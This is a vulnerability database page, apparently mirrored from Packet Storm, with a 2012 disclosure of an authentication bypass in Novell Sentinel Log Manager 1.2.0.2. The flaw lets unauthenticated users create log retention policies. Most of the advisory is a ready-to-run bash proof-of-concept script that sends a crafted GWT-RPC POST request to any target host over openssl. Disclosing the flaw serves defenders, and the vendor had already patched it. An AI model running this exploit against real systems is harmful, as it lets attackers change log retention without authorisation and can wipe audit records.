Lucene search
K

Novell Sentinel Log Manager 1.2.0.2 Bypass

🗓️ 03 Oct 2012 00:00:00Reported by Piotr ChmylkowskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Novell Sentinel Log Manager 1.2.0.2 unauthenticated retention policy configuratio

Code
`Hello,  
  
Novell Sentinel Log Manager ver. <=1.2.0.2 allows unauthenticated  
users configuring retention policies.  
  
Vendor informed: 2012/09/06  
Patch Released: 2012/09/21  
PoC:  
  
#!/bin/bash  
  
TARGET=$1  
PORT=8443  
  
if [ $# -ne 1 ]; then  
echo "Usage: `basename $0` target"  
exit 1  
fi  
  
echo "POST /novelllogmanager/datastorageservice.rpc HTTP/1.1  
Host: $TARGET:$PORT  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Content-Type: text/x-gwt-rpc; charset=utf-8  
X-GWT-Permutation: whatever  
X-GWT-Module-Base:  
https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/  
Content-Length: 385  
Cookie: JSESSIONID=whatever  
Pragma: no-cache  
Cache-Control: no-cache  
Connection: close  
  
5|0|9|https://$TARGET:$PORT/novelllogmanager/com.novell.siem.logmanager.LogManager/|E377321CAAD2FABED6283BD3643E4289|com.novell.sentinel.scout.client.datastorage.SentinelDataStorageService|createRetentionPolicy|com.novell.sentinel.scout.client.datastorage.retention.RetentionPolicy/419393389|sev:[0  
TO 5]|1|AAA|java.util.ArrayList/3821976829|1|2|3|4|1|5|5|0|0|0|6|1|7|7|8|0|0|9|0|  
  
  
" | openssl s_client -quiet -connect $TARGET:$PORT  
  
Regards,  
Piotr  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation